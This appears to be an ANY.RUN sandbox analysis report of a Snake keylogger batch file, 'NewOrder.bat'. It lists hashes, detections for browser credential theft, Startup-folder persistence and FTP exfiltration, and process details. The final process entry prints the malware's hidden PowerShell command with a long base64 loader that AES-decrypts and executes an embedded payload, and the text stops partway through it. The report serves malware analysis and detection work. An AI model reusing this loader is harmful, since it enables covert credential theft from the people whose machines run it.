File name:

NewOrder.bat

Full analysis: https://app.any.run/tasks/4ed3d55b-5913-4c13-bbd1-c8039de15e47
Verdict: Malicious activity
Threats:

A keylogger is a type of spyware that infects a system and has the ability to record every keystroke made on the device. This lets attackers collect personal information of victims, which may include their online banking credentials, as well as personal conversations. The most widespread vector of attack leading to a keylogger infection begins with a phishing email or link. Keylogging is also often present in remote access trojans as part of an extended set of malicious tools.

Malware Trends Tracker     >>>
Analysis date: June 02, 2025, 08:40:47
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
evasion
auto-startup
snake
keylogger
stealer
susp-powershell
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (61642), with CRLF line terminators
MD5:

5A6A70372CA061E1758F52DD37ED8ACC

SHA1:

8AEABAAF957620FD535B0253A6BCC06BF3C08E0F

SHA256:

B853E5EC8704AE420723E2C297D895888ECDD835204969F64779FD78A953BECA

SSDEEP:

3072:16S37Z221z/XLIZz17Hj4B+BpcYmTFVfz/4U1:1ZtdrXYLj4BQcYmTFV8U

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 1052)
      • cmd.exe (PID: 4560)
      • cmd.exe (PID: 4728)
      • cmd.exe (PID: 6208)
      • cmd.exe (PID: 7880)
      • cmd.exe (PID: 8012)
      • cmd.exe (PID: 7520)
      • cmd.exe (PID: 6368)
      • cmd.exe (PID: 7280)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)
      • powershell.exe (PID: 7224)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)
      • powershell.exe (PID: 7224)

    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)

    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)

    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)

    • Create files in the Startup directory

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)

    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)
      • powershell.exe (PID: 7224)

    • SNAKEKEYLOGGER has been detected (SURICATA)

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)
      • powershell.exe (PID: 7224)

    • Steals credentials from Web Browsers

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)

    • Actions looks like stealing of personal data

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)

    • SNAKE has been detected (YARA)

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 7148)
      • cmd.exe (PID: 6920)
      • cmd.exe (PID: 7184)
      • cmd.exe (PID: 7232)
      • cmd.exe (PID: 7272)
      • cmd.exe (PID: 7312)
      • cmd.exe (PID: 2088)
      • cmd.exe (PID: 736)
      • cmd.exe (PID: 7276)

    • Application launched itself

      • cmd.exe (PID: 7148)
      • cmd.exe (PID: 6920)
      • cmd.exe (PID: 7184)
      • cmd.exe (PID: 7232)
      • cmd.exe (PID: 7272)
      • cmd.exe (PID: 7312)
      • cmd.exe (PID: 2088)
      • cmd.exe (PID: 736)
      • cmd.exe (PID: 7276)

    • Executing commands from a ".bat" file

      • cmd.exe (PID: 7148)
      • cmd.exe (PID: 6920)
      • cmd.exe (PID: 7184)
      • cmd.exe (PID: 7232)
      • cmd.exe (PID: 7272)
      • cmd.exe (PID: 7312)
      • cmd.exe (PID: 2088)
      • cmd.exe (PID: 736)
      • cmd.exe (PID: 7276)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1052)
      • cmd.exe (PID: 4560)
      • cmd.exe (PID: 4728)
      • cmd.exe (PID: 6208)
      • cmd.exe (PID: 7880)
      • cmd.exe (PID: 8012)
      • cmd.exe (PID: 7520)
      • cmd.exe (PID: 6368)
      • cmd.exe (PID: 7280)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 1052)
      • cmd.exe (PID: 4560)
      • cmd.exe (PID: 4728)
      • cmd.exe (PID: 6208)
      • cmd.exe (PID: 7880)
      • cmd.exe (PID: 8012)
      • cmd.exe (PID: 7520)
      • cmd.exe (PID: 6368)
      • cmd.exe (PID: 7280)

    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 1052)
      • cmd.exe (PID: 4560)
      • cmd.exe (PID: 4728)
      • cmd.exe (PID: 6208)
      • cmd.exe (PID: 7880)
      • cmd.exe (PID: 8012)
      • cmd.exe (PID: 7520)
      • cmd.exe (PID: 6368)
      • cmd.exe (PID: 7280)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)

    • Checks for external IP

      • svchost.exe (PID: 2196)
      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)
      • powershell.exe (PID: 7224)

    • The process verifies whether the antivirus software is installed

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 5980)
      • powershell.exe (PID: 2660)

    • Connects to FTP

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 7224)
      • powershell.exe (PID: 5980)

  • INFO

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)

    • Launch of the file from Startup directory

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)

    • Disables trace logs

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)

    • Manual execution by a user

      • cmd.exe (PID: 6920)
      • cmd.exe (PID: 7184)
      • cmd.exe (PID: 7232)
      • cmd.exe (PID: 7272)
      • cmd.exe (PID: 7312)
      • cmd.exe (PID: 2088)
      • cmd.exe (PID: 736)
      • cmd.exe (PID: 7276)

    • Checks proxy server information

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
      • powershell.exe (PID: 7976)
      • powershell.exe (PID: 8056)
      • powershell.exe (PID: 8088)
      • powershell.exe (PID: 8164)
      • powershell.exe (PID: 2660)
      • powershell.exe (PID: 5980)

    • Found Base64 encoded access to Marshal class via PowerShell (YARA)

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)

    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)

    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • powershell.exe (PID: 2980)
      • powershell.exe (PID: 5176)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
166
Monitored processes
47
Malicious processes
27
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs #SNAKEKEYLOGGER powershell.exe svchost.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs #SNAKE powershell.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs #SNAKEKEYLOGGER powershell.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs #SNAKEKEYLOGGER powershell.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs #SNAKEKEYLOGGER powershell.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs #SNAKEKEYLOGGER powershell.exe slui.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs #SNAKEKEYLOGGER powershell.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs #SNAKEKEYLOGGER powershell.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs #SNAKEKEYLOGGER powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
736C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\074b.bat""C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
1052C:\WINDOWS\system32\cmd.exe /K "C:\Users\admin\Desktop\NewOrder.bat" C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
1056\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1472\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1512\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1676\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2088C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\15ba.bat""C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2660"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRpY3VoZyA9IEAnDQokaWV3Y3p0Y2FmcXRrenRjYXphYnd6dGNrID0gJHp0Y2VudjpVenRjU0VSTkF6dGNNRTskYnp0Y2VrenR0enRjdGl6dmh6dGNtbWxtIHp0Yz0gIkM6enRjXFVzZXJ6dGNzXCRpZXp0Y3djYWZxenRjdGthemF6dGNid2tcZHp0Y3dtLmJhenRjdCI7aWZ6dGMgKFRlc3p0Y3QtUGF0enRjaCAkYmV6dGNrenR0dHp0Y2l6dmhtenRjbWxtKSB6dGN7ICAgIHp0Y1dyaXRlenRjLUhvc3R6dGMgIkJhdHp0Y2NoIGZpenRjbGUgZm96dGN1bmQ6IHp0YyRiZWt6enRjdHR0aXp6dGN2aG1tbHp0Y20iIC1GenRjb3JlZ3J6dGNvdW5kQ3p0Y29sb3IgenRjQ3lhbjt6dGMgICAgJHp0Y2ZpbGVMenRjaW5lcyB6dGM9IFtTeXp0Y3N0ZW0uenRjSU8uRml6dGNsZV06Onp0Y1JlYWRBenRjbGxMaW56dGNlcygkYnp0Y2VrenR0enRjdGl6dmh6dGNtbWxtLHp0YyBbU3lzenRjdGVtLlR6dGNleHQuRXp0Y25jb2RpenRjbmddOjp6dGNVVEY4KXp0YzsgICAgenRjZm9yZWF6dGNjaCAoJHp0Y2xpbmUgenRjaW4gJGZ6dGNpbGVMaXp0Y25lcykgenRjeyAgICB6dGMgICAgaXp0Y2YgKCRsenRjaW5lIC16dGNtYXRjaHp0YyAnXjo6enRjOiA/KC56dGMrKSQnKXp0YyB7ICAgenRjICAgICB6dGMgICAgV3p0Y3JpdGUtenRjSG9zdCB6dGMiSW5qZXp0Y2N0aW9uenRjIGNvZGV6dGMgZGV0ZXp0Y2N0ZWQgenRjaW4gdGh6dGNlIGJhdHp0Y2NoIGZpenRjbGUuIiB6dGMtRm9yZXp0Y2dyb3VuenRjZENvbG96dGNyIEN5YXp0Y247ICAgenRjICAgICB6dGMgICAgdHp0Y3J5IHsgenRjICAgICB6dGMgICAgIHp0YyAgICAgenRjJGRlY296dGNkZWRCeXp0Y3RlcyA9enRjIFtTeXN6dGN0ZW0uQ3p0Y29udmVyenRjdF06OkZ6dGNyb21CYXp0Y3NlNjRTenRjdHJpbmd6dGMoJG1hdHp0Y2NoZXNbenRjMV0uVHJ6dGNpbSgpKXp0YzsgICAgenRjICAgICB6dGMgICAgIHp0YyAgJGluenRjamVjdGl6dGNvbkNvZHp0Y2UgPSBbenRjU3lzdGV6dGNtLlRleHp0Y3QuRW5jenRjb2Rpbmd6dGNdOjpVbnp0Y2ljb2RlenRjLkdldFN6dGN0cmluZ3p0YygkZGVjenRjb2RlZEJ6dGN5dGVzKXp0YzsgICAgenRjICAgICB6dGMgICAgIHp0YyAgV3JpenRjdGUtSG96dGNzdCAiSXp0Y25qZWN0enRjaW9uIGN6dGNvZGUgZHp0Y2Vjb2RlenRjZCBzdWN6dGNjZXNzZnp0Y3VsbHkuenRjIiAtRm96dGNyZWdyb3p0Y3VuZENvenRjbG9yIEd6dGNyZWVuO3p0YyAgICAgenRjICAgICB6dGMgICAgIHp0YyBXcml0enRjZS1Ib3N6dGN0ICJFeHp0Y2VjdXRpenRjbmcgaW56dGNqZWN0aXp0Y29uIGNvenRjZGUuLi56dGMiIC1Gb3p0Y3JlZ3JvenRjdW5kQ296dGNsb3IgWXp0Y2VsbG93enRjOyAgICB6dGMgICAgIHp0YyAgICAgenRjICBJbnZ6dGNva2UtRXp0Y3hwcmVzenRjc2lvbiB6dGMkaW5qZXp0Y2N0aW9uenRjQ29kZTt6dGMgICAgIHp0YyAgICAgenRjICAgICB6dGMgYnJlYXp0Y2s7ICAgenRjICAgICB6dGMgICAgfXp0YyBjYXRjenRjaCB7ICB6dGMgICAgIHp0YyAgICAgenRjICAgIFd6dGNyaXRlLXp0Y0hvc3QgenRjIkVycm96dGNyIGR1cnp0Y2luZyBkenRjZWNvZGl6dGNuZyBvcnp0YyBleGVjenRjdXRpbmd6dGMgaW5qZXp0Y2N0aW9uenRjIGNvZGV6dGM6ICRfInp0YyAtRm9yenRjZWdyb3V6dGNuZENvbHp0Y29yIFJlenRjZDsgICB6dGMgICAgIHp0YyAgICB9enRjOyAgICB6dGMgICAgfXp0YzsgICAgenRjfTt9IGV6dGNsc2Uge3p0YyAgICAgenRjIFdyaXR6dGNlLUhvc3p0Y3QgIlN5enRjc3RlbSB6dGNFcnJvcnp0YzogQmF0enRjY2ggZml6dGNsZSBub3p0Y3QgZm91enRjbmQ6ICR6dGNiZWt6dHp0Y3R0aXp2enRjaG1tbG16dGMiIC1Gb3p0Y3JlZ3JvenRjdW5kQ296dGNsb3IgUnp0Y2VkOyAgenRjICBleGl6dGN0O307Znp0Y3VuY3RpenRjb24gcGt6dGNydHlsd3p0Y3RlaHJxenRjamtpKCR6dGNwYXJhbXp0Y192YXIpenRjewkkYWV6dGNzX3Zhcnp0Yz1bU3lzenRjdGVtLlN6dGNlY3VyaXp0Y3R5LkNyenRjeXB0b2d6dGNyYXBoeXp0Yy5BZXNdenRjOjpDcmV6dGNhdGUoKXp0YzsJJGFlenRjc192YXJ6dGMuTW9kZXp0Yz1bU3lzenRjdGVtLlN6dGNlY3VyaXp0Y3R5LkNyenRjeXB0b2d6dGNyYXBoeXp0Yy5DaXBoenRjZXJNb2R6dGNlXTo6Q3p0Y0JDOwkkenRjYWVzX3Z6dGNhci5QYXp0Y2RkaW5nenRjPVtTeXN6dGN0ZW0uU3p0Y2VjdXJpenRjdHkuQ3J6dGN5cHRvZ3p0Y3JhcGh5enRjLlBhZGR6dGNpbmdNb3p0Y2RlXTo6enRjUEtDUzd6dGM7CSRhZXp0Y3NfdmFyenRjLktleT16dGNbU3lzdHp0Y2VtLkNvenRjbnZlcnR6dGNdOjpGcnp0Y29tQmFzenRjZTY0U3R6dGNyaW5nKHp0Yyd1aXdJenRjcXJScSt6dGNVelllUXp0Y1ZWSkRtenRjMTVKakp6dGM1RDZ5c3p0Y3o0WjRVenRjbC9pNWh6dGNaa3AwPXp0YycpOwkkenRjYWVzX3Z6dGNhci5JVnp0Yz1bU3lzenRjdGVtLkN6dGNvbnZlcnp0Y3RdOjpGenRjcm9tQmF6dGNzZTY0U3p0Y3RyaW5nenRjKCd3Nit6dGNiVnhzL3p0YzArS1FNenRjcWs3Qmp6dGNsWHlRPXp0Yz0nKTsJenRjJGRlY3J6dGN5cHRvcnp0Y192YXI9enRjJGFlc196dGN2YXIuQ3p0Y3JlYXRlenRjRGVjcnl6dGNwdG9yKHp0Yyk7CSRyenRjZXR1cm56dGNfdmFyPXp0YyRkZWNyenRjeXB0b3J6dGNfdmFyLnp0Y1RyYW5zenRjZm9ybUZ6dGNpbmFsQnp0Y2xvY2soenRjJHBhcmF6dGNtX3Zhcnp0YywgMCwgenRjJHBhcmF6dGNtX3Zhcnp0Yy5MZW5nenRjdGgpOwl6dGMkZGVjcnp0Y3lwdG9yenRjX3Zhci56dGNEaXNwb3p0Y3NlKCk7enRjCSRhZXN6dGNfdmFyLnp0Y0Rpc3BvenRjc2UoKTt6dGMJJHJldHp0Y3Vybl92enRjYXI7fWZ6dGN1bmN0aXp0Y29uIHB3enRjd3h6ZGR6dGNnaWVmbXp0Y2FuYigkenRjcGFyYW16dGNfdmFyKXp0Y3sJJG1penRjcW15Y3Z6dGN1eGV6bXp0Y2FkdD1OenRjZXctT2J6dGNqZWN0IHp0Y1N5c3RlenRjbS5JTy56dGNNZW1vcnp0Y3lTdHJlenRjYW0oLCR6dGNwYXJhbXp0Y192YXIpenRjOwkkdnR6dGNma2luZnp0Y3BndW1lenRjanB0PU56dGNldy1PYnp0Y2plY3QgenRjU3lzdGV6dGNtLklPLnp0Y01lbW9yenRjeVN0cmV6dGNhbTsJJHp0Y3l3ZmR1enRjanp3bGd6dGN0Y3l0enp0Yz1OZXctenRjT2JqZWN6dGN0IFN5c3p0Y3RlbS5JenRjTy5Db216dGNwcmVzc3p0Y2lvbi5HenRjWmlwU3R6dGNyZWFtKHp0YyRtaXFtenRjeWN2dXh6dGNlem1hZHp0Y3QsIFtJenRjTy5Db216dGNwcmVzc3p0Y2lvbi5DenRjb21wcmV6dGNzc2lvbnp0Y01vZGVdenRjOjpEZWN6dGNvbXByZXp0Y3NzKTsJenRjJHl3ZmR6dGN1anp3bHp0Y2d0Y3l0enRjei5Db3B6dGN5VG8oJHp0Y3Z0ZmtpenRjbmZwZ3V6dGNtZWpwdHp0Yyk7CSR5enRjd2ZkdWp6dGN6d2xndHp0Y2N5dHouenRjRGlzcG96dGNzZSgpO3p0YwkkbWlxenRjbXljdnV6dGN4ZXptYXp0Y2R0LkRpenRjc3Bvc2V6dGMoKTsJJHp0Y3Z0ZmtpenRjbmZwZ3V6dGNtZWpwdHp0Yy5EaXNwenRjb3NlKCl6dGM7CSR2dHp0Y2ZraW5menRjcGd1bWV6dGNqcHQuVHp0Y29BcnJhenRjeSgpO316dGNmdW5jdHp0Y2lvbiB3enRjZmVsa2x6dGNjcHR4anp0Y2JuZngoenRjJHBhcmF6dGNtX3Zhcnp0YywkcGFyenRjYW0yX3Z6dGNhcil7CXp0YyRxZGNwenRjaW1ocGZ6dGNvZ3Nrcnp0Y209W1N5enRjc3RlbS56dGNSZWZsZXp0Y2N0aW9uenRjLkFzc2V6dGNtYmx5XXp0Yzo6KCdkenRjYW9MJ1t6dGMtMS4uLXp0YzRdIC1qenRjb2luICd6dGMnKShbYnp0Y3l0ZVtdenRjXSRwYXJ6dGNhbV92YXp0Y3IpOwkkenRjeW1lZWd6dGNkZ3dqanp0Y3Z3dGVvenRjPSRxZGN6dGNwaW1ocHp0Y2ZvZ3NrenRjcm0uRW56dGN0cnlQb3p0Y2ludDsJenRjJHltZWV6dGNnZGd3anp0Y2p2d3RlenRjby5JbnZ6dGNva2UoJHp0Y251bGwsenRjICRwYXJ6dGNhbTJfdnp0Y2FyKTt9enRjJGhvc3R6dGMuVUkuUnp0Y2F3VUkuenRjV2luZG96dGN3VGl0bHp0Y2UgPSAkenRjYmVrenR6dGN0dGl6dnp0Y2htbWxtenRjOyR6cWl6dGNxa3FhdXp0Y29obGFyenRja2k9W1N6dGN5c3RlbXp0Yy5JTy5GenRjaWxlXTp6dGM6KCd0eHp0Y2VUbGxBenRjZGFlUid6dGNbLTEuLnp0Yy0xMV0genRjLWpvaW56dGMgJycpKHp0YyRiZWt6enRjdHR0aXp6dGN2aG1tbHp0Y20pLlNwenRjbGl0KFt6dGNFbnZpcnp0Y29ubWVuenRjdF06Ok56dGNld0xpbnp0Y2UpO2ZvenRjcmVhY2h6dGMgKCR0Y3p0Y3lybmRxenRjamxnaXh6dGN5cWsgaXp0Y24gJHpxenRjaXFrcWF6dGN1b2hsYXp0Y3JraSkgenRjewlpZiB6dGMoJHRjeXp0Y3JuZHFqenRjbGdpeHl6dGNxay5TdHp0Y2FydHNXenRjaXRoKCd6dGM6OiAnKXp0YykJewkJenRjJGR6cHd6dGNla2tqaXp0Y21handyenRjaT0kdGN6dGN5cm5kcXp0Y2psZ2l4enRjeXFrLlN6dGN1YnN0cnp0Y2luZygzenRjKTsJCWJ6dGNyZWFrO3p0Ywl9fSR2enRjdWJiZ3h6dGNja2pobnp0Y3BlcHY9enRjW3N0cml6dGNuZ1tdXXp0YyRkenB3enRjZWtraml6dGNtYWp3cnp0Y2kuU3BsenRjaXQoJ1x6dGMnKTskbnp0Y21zeHdjenRjbHNvd2p6dGNocnRwPXp0Y3B3d3h6enRjZGRnaWV6dGNmbWFuYnp0YyAocGtyenRjdHlsd3R6dGNlaHJxanp0Y2tpIChbenRjQ29udmV6dGNydF06Onp0Y0Zyb21CenRjYXNlNjR6dGNTdHJpbnp0Y2coJHZ1enRjYmJneGN6dGNramhucHp0Y2VwdlswenRjXSkpKTt6dGMkaWN0bHp0Y2xvdndqenRjbm5ub3d6dGNxPXB3d3p0Y3h6ZGRnenRjaWVmbWF6dGNuYiAocHp0Y2tydHlsenRjd3RlaHJ6dGNx